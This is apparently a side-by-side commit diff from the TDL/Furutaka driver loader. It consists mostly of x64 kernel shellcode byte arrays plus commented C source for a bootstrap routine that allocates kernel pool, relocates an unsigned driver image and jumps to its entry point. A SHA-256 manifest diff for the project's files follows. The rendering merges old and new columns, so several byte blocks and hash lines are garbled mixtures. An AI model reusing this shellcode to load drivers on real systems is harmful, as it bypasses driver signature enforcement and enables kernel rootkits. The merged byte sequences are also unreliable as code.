0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, 0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, 0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, 0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C,
0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48,
0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0,
0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3
};
/*
* TDLBootstrapLoader_w10rs2
*
* Purpose:
*
* Main part of shellcode used to execute driver code since w10rs2.
*
*/
/*
void TDLBootstrapLoader_w10rs2(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag
)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
PfnDriverEntry DriverEntry;
ULONG isz = popth->SizeOfImage;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint);
DriverEntry();
}
*/
static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = {
0x40, 0x53, 0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50,
0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00,
0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D,
0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10,
0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05,
0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE,
0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00,
0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72,
0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B,
0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48,
0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF,
0xE0
}; };

30
TDL.sha256
View File

@ -1,32 +1,32 @@
c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys
4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys
9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln 14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln
01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c 4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln 14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln
2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj
f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c 1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c
cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h 6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln 24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj 656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h 9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c 94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h 33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c 2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h 8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc 2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc
f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h 6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h
fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h 059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h 12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h